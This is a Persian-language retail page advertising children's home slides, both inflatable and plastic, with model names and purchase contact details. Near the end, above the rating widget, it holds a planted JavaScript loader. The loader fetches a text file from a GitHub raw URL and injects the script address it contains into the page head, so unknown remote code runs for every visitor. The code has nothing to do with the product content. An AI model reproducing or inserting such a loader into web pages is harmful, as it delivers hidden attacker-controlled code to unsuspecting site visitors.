سرسره های خانگی که در خانه میتوانید استفاده کنید
سرسره های خانگی که در خانه میتوانید استفاده کنید

سرسره های خانگی که در خانه میتوانید استفاده کنید

  • سرسره های خانگی که می توانید در خانه برای تفریح کودکان خود استفاده کنید.ما درباره این محصولات توضیح داده بودیم این دو نوع جا مانده بود.

    چه سرسره های در خانه استفاده می شود

    سرسره های خانگی به 2 دسته تقسیم می شود. دسته اول شامل سرسره های بادی است و دسته دوم سرسره های پلاستیکی

    سرسره های بادی

    سرسره بادی مهد کودکی عموما به سرسره بادی هایی گفته می شود که از ارتفاع پایین تر از سرسره های دیگر بر خوردار است. همچنین این سرسره بادی ها فضای کمتری را در بر می گیرند. این محصولات برای سنین پایین تر و کودکان استفاده می شود و برای سنین بالاتر مناسب نیست. قیمت این قصر بادی ها نسبتا پایین تر از قیمت قصر بادی های دیگر می باشد. ماننده سرسره های  سرسره بادی مهد کودکی حلزونی KM-152 – سرسره بادی مک کوئین KM-142 و…

    سرسره های پلاستیکی

    از جمله وسایل بازی محبوب و پرطرفدار درکودکان محسوب می شود. سرسره پلاستیکی در دو نوع خانگی و پارکی ساخته می شود.در این مطلب بیشتر به خصوصیات سرسرخ کودک خانگی و فضای داخلی می پردازیم.سرسره های پلاستیکی محصولات جدید بادی سازان مجد است. این سرسره به 2 نوع تک یا به صورت ترکیبی مجود می باشد. نوع 1 سرسره تک است، نوع 2 شامل یک سرسره به همراه تاب و بستکبال، سرسره به همراه پل معلق و یک سبد بسکتبال و … می باشد. جنس این سرسره ها از پلاستیک مقاوم در برابر ضربه و نور افتاب می باشد. نمونه این محصولات سرسره پلاستیکی کودک

    نحوه خرید این محصولات

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این سرسره ها به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید